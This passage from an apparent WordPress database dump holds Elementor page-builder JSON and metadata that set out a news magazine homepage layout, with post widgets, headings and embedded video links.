eral_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1422,491,'_elementor_version','0.4'),(1423,491,'_elementor_css','a:3:{s:4:\"time\";i:1508920344;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1425,492,'_elementor_edit_mode','builder'),(1426,492,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\